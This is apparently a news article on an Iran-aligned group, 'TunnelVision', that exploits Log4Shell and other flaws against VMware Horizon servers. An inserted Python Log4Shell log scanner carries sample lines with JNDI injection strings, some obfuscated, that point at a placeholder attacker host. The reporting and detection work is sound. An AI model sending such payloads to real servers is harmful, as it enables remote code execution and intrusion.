A “potentially destructive actor” aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability[1] to infect unpatched VMware Horizon servers with ransomware.
Cybersecurity firm SentinelOne dubbed the group “TunnelVision” owing to its heavy reliance on tunneling tools, noting overlaps in tactics with those of a broader group tracked under the moniker Phosphorus[2] as well as Charming Kitten and Nemesis Kitten.
“TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,” SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said[3] in a report, with the intrusions detected in the Middle East and the U.S.
Also observed alongside Log4Shell is the exploitation of the Fortinet FortiOS path traversal flaw (CVE-2018-13379[4]) and the Microsoft Exchange ProxyShell[5] vulnerability to gain initial access to target networks before post-exploitation activity.
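A defender-side check for the Log4Shell initial-access vector described above, added here as an example and not taken from the report or from SentinelOne's tooling: a JNDI lookup string left in a Horizon request log is often split across nested Log4j lookups so that the literal text “jndi” never appears, so the scanner below resolves that nesting before matching. The log format and the sample lines are constructed; the address 198.51.100.7 is a documentation-range placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample request-log lines (not from the report); 198.51.100.7 is a
# documentation-range address standing in for an attacker-controlled host.
SAMPLE_LOGS = [
    '"GET /portal/webclient/index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '"GET /portal/info.jsp HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '"GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7/x}"',
    '"GET /portal/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/y}"',
    '"GET /portal/ HTTP/1.1" 200 "${env:HOME} plain text with a harmless lookup"',
]

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")          # innermost ${...}, nothing nested inside
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):", re.I)  # resolved JNDI lookup and its scheme

def normalize_lookups(value, max_passes=10):
    """Collapse nested Log4j lookups that split up the string 'jndi'.
    Rules that matter here: ${lower:x} -> x, ${upper:x} -> X,
    ${a:b:-default} -> default; any other lookup is dropped."""
    for _ in range(max_passes):
        changed = False
        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.lower().startswith("jndi:"):
                return m.group(0)            # terminal: keep the JNDI lookup visible
            changed = True
            if ":-" in body:
                return body.split(":-", 1)[1]
            if body.lower().startswith("lower:"):
                return body[6:].lower()
            if body.lower().startswith("upper:"):
                return body[6:].upper()
            return ""
        value = INNER_LOOKUP.sub(repl, value)
        if not changed:
            break
    return value

def detect_log4shell(line):
    """Return the JNDI scheme ('ldap', 'rmi', ...) the line would reach out over, else None."""
    m = JNDI_LOOKUP.search(normalize_lookups(unquote(line)))
    return m.group(1).lower() if m else None

def scan(lines):
    """Pair each flagged log line with its JNDI scheme for triage."""
    hits = [(line, detect_log4shell(line)) for line in lines]
    return [(line, scheme) for line, scheme in hits if scheme]
```

The scheme tells the analyst which outbound protocol to look for in egress logs when confirming whether the lookup actually resolved.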
“TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,” the researchers said.
The PowerShell commands serve as a launchpad to download tools like Ngrok and to run further commands through reverse shells, which in turn drop a PowerShell backdoor capable of gathering credentials and executing reconnaissance commands.
SentinelOne also said it identified similarities between the mechanism used to execute the reverse web shell and another PowerShell-based implant called PowerLess[6] that was disclosed by Cybereason researchers earlier this month.
Throughout the activity, the threat actor is said to have used a GitHub repository named “VmWareHorizon” under the username “protections20” to host the malicious payloads.
The cybersecurity company said it is associating the attacks with a separate Iranian cluster not because they are unrelated, but because “there is at present insufficient data to treat them as identical to any of the aforementioned attributions.”
References
[1] Log4j vulnerability (thehackernews.com)
[2] Phosphorus (thehackernews.com)
[3] said (www.sentinelone.com)
[4] CVE-2018-13379 (thehackernews.com)
[5] ProxyShell (thehackernews.com)
[6] PowerLess (thehackernews.com)
Read more: https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html